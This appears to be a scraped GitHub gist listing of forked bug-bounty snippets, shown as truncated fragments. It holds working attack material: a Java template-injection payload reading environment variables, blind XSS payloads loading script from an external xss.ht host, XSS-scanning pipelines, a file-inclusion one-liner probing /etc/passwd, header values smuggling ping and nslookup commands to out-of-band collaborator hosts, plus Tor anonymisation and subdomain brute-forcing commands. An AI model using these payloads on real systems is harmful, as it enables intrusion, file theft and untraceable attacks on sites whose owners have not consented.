-
Typically java ssti payloads start with
$. But if that character is banned you can use*instead of that. -
Get env vars
*{T(java.lang.System).getenv()}
- Read files (
/etc/passwd)
emadshanab
/ xss-one-liner
Created
August 28, 2022 08:07
— forked from simrotion13/xss-one-liner
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #cat targets_urls.txt | |
| http://testphp.vulnweb.com | |
| ## Command Line | |
| gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt | |
| #tool used | |
| #https://github.com/jaeles-project/gospider | |
| #https://github.com/tomnomnom/qsreplace |
emadshanab
/ swagger-ui nuclei module
Created
August 28, 2022 08:03
— forked from kannthu/swagger-ui nuclei module
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: swagger-ui | |
| info: | |
| name: Swagger UI | |
| author: vidocsecurity | |
| severity: low | |
| description: Swagger UI exposes information about endpoints and sometimes it is vulnerable tu XSS | |
| tags: swagger-ui,exposure | |
| requests: |
emadshanab
/ how to use
Created
August 11, 2022 01:06
— forked from carlware/how to use
proxychains and tor (change ip ~10 seconds)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # install | |
| sudo apt-get install proxychains | |
| sudo apt-get install tor | |
| # then update the files /etc/proxychains.conf and /etc/tor/torrc with the given config | |
| # restart tor server | |
| sudo service restart tor |
emadshanab
/ bxss-payload.txt
Created
August 3, 2022 06:50
— forked from Huntinex/bxss-payload.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "><script src=https://username.xss.ht></script> | |
| '><script src=https://username.xss.ht></script> | |
| ";eval('var a=document.createElement(\'script\');a.src=\'https://username.xss.ht\';document.body.appendChild(a)') |
emadshanab
/ java-ssti.md
Created
July 24, 2022 04:39
— forked from kavishkagihan/java-ssti.md
emadshanab
/ oneliner
Created
July 24, 2022 04:23
— forked from 0x3n0/oneliner
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| assetfinder https://exmple.com | gau --subs | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=1"><svg onload=alert(1)>/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars";done | |
| assetfinder https://exmple.com | gau --subs https://exmple.com | gf lfi | place "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"' | |
| gf lfi output/domains.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H "Host: $(hostname).burpcollab.net" -H "Referer: 8.8.8.8;ping -c 3 $(hostname).burpcollab.net" -H "X-Forwarded-Host: 8.8.8.8;nslookup+callesvmkd63gvfclgjg63ktieresg7dt.oast.online" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/101.0.4951.64 Safari/537.36" -w ~/wordlist.txt -fc 405 -mc 200,403 -ac true; done | |
| ### DNS rebinding for RCE | |
| gf lfi output/*.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H |
emadshanab
/ linkfinder-oneliner.sh
Created
July 24, 2022 04:20
— forked from ntrzz/linkfinder-oneliner.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt |
emadshanab
/ nmap.txt
Created
July 24, 2022 04:14
— forked from ehsahil/nmap.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Finding subdomains via Nmap. | |
| nmap --script dns-brute --script-args dns-brute.domain=domain.com,dns-brute.threads=6,dns-brute.hostlist=./sub1000.lst | |
| nmap --script dns-brute --script-args dns-brute.domain=domain.com,dns-brute.threads=6,dns-brute.hostlist=./sub10000.lst | |
| nmap --script dns-brute --script-args dns-brute.domain=domain.com,dns-brute.threads=6,dns-brute.hostlist=./sub100000.lst | |
| nmap --script dns-brute --script-args dns-brute.domain=domain.com,dns-brute.threads=6,dns-brute.hostlist=./sub1000000.lst |
emadshanab
/ Bug_Bounty_tips
Created
July 24, 2022 04:11
— forked from BugHunter001/Bug_Bounty_tips
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| site.com/file.php | |
| response = nothing | |
| http://site.com/file.php~ | |
| response = source | |
| ------------------------------------- | |
| https://github.com/kleiton0x00/CRLF-one-liner | |
| ------------------------------------------ | |
| try to add admin as your user, | |
| change his email to yours, |
emadshanab
/ FFUF-Payloads.txt
Created
July 24, 2022 04:10
— forked from Cuncis/FFUF-Payloads.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ```FFUF | |
| -fc (filter code): hidden | |
| -mc (match code): match/only | |
| -w: read from stdout (coding 1 line) | |
| -ic: ignore comments in wordlists (headers, copyright notes, comments, etc.) | |
| ``` | |
| ```Payloads | |
| ffuf -u http://10.10.226.27/FUZZ -w /opt/seclists/raft-medium-words-lowercase.txt -c -e .php,.txt | |
| ``` |